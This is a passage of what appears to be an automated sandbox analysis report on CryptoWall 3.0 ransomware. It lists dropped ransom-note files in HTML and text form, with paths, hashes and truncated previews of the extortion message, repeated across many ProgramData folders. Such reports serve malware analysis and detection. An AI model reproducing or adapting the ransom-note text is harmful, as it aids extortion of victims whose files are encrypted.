                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\DeviceSync\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Diagnosis\ETLLogs\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Diagnosis\ETLLogs\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Diagnosis\Sideload\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Diagnosis\Sideload\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Diagnosis\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Diagnosis\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\IdentityCRL\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\IdentityCRL\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\IlsCache\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\IlsCache\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\MF\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\MF\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Media Player\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Media Player\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\NetFramework\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
